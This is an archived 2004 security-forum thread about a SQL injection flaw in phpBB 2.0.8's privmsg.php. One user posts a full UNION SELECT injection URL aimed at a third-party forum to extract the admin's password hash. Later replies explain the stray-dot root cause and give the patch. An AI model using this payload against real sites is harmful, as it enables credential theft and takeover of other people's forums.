Waraxe IT Security Portal
Login or Register
November 17, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 63
Members: 0
Total: 63
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> PHPBB 2.08 admin rights problem (newby)
Post new topicReply to topic View previous topic :: View next topic
PHPBB 2.08 admin rights problem (newby)
PostPosted: Thu May 27, 2004 9:08 am Reply with quote
k_deda
Beginner
Beginner
Joined: May 27, 2004
Posts: 2




Hi all ,

Here is what I have done.

As other entries said.
1. I registered to the target forum.
2. Open mozilla browser
3. Type the adress bar, below adres
Code:

http://www.XXXXX.com/forum/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password%20FROM%20phpbb_users%20WHERE%20user_level=1%20LIMIT%201/*

4. This is the screen shot what I have get.

[img]
http://kafkas.europe.webmatrixhosting.net/phpbb.jpg
[/img]

Now where can I find the MD5 hash in this window?
What I am doing wrong.

PS : Dear Javek really thanks to your e-mail that show me the way to this forum. I am searching this subject for 2 weeks and I am almost getting mad.

Thanks in advance.
View user's profile Send private message Send e-mail
PostPosted: Thu May 27, 2004 9:18 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Seems, that this target is patched allready or has mysql version 3.x without UNION functionality enabled. Therefore traditional sploit is not working here...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu May 27, 2004 9:42 am Reply with quote
k_deda
Beginner
Beginner
Joined: May 27, 2004
Posts: 2




Sad
At least I learned that, i am not a moron.

Thanks for your interest.

Please check your pm.

Regards
View user's profile Send private message Send e-mail
PostPosted: Wed Jun 02, 2004 6:07 am Reply with quote
Dionysus
Regular user
Regular user
Joined: Jun 02, 2004
Posts: 9




Hi,

So what is the patch for this...? I managed to message myself my MD5.. I need this closed..!!
View user's profile Send private message
PostPosted: Wed Jun 02, 2004 6:05 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Just install latest phpbb version, which is allready patched. Or change only the affected file.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jun 02, 2004 8:20 pm Reply with quote
Dionysus
Regular user
Regular user
Joined: Jun 02, 2004
Posts: 9




Sorry waraxe - I have only caught the tail end of this - which file is affected? and which bit of code?
View user's profile Send private message
PostPosted: Wed Jun 02, 2004 9:29 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I have advisory about this phpBB issue:

http://www.waraxe.us/?modname=sa&id=013

Affected file is "privmsg.php", problem is in this piece of code:

Code:

case 'sentbox':
$l_box_name = $lang['Sentbox'];
$pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
break;
case 'savebox':
$l_box_name = $lang['Savebox'];
$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )
OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " )
)";
break;
default:



As you can see, in case of "savebox" variable "$pm_sql_user" is
concatenated (thanks to additional dot, which is just typo, i think) and
because $pm_sql_user is not initialized anywhere, we can inject any data
to $pm_sql_user from GET, POST or COOKIE parameters.
So - the patch - simplest ever! Just delete that additional dot! So this code fragment should be as:

Code:

case 'sentbox':
$l_box_name = $lang['Sentbox'];
$pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
break;
case 'savebox':
$l_box_name = $lang['Savebox'];
$pm_sql_user = "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )
OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "
AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " )
)";
break;
default:



Good example, how much can mean just one additional dot Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jun 02, 2004 11:45 pm Reply with quote
Dionysus
Regular user
Regular user
Joined: Jun 02, 2004
Posts: 9




Thanks.. patching now.. just one dot.. amazing!
View user's profile Send private message
PHPBB 2.08 admin rights problem (newby)
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.051 Seconds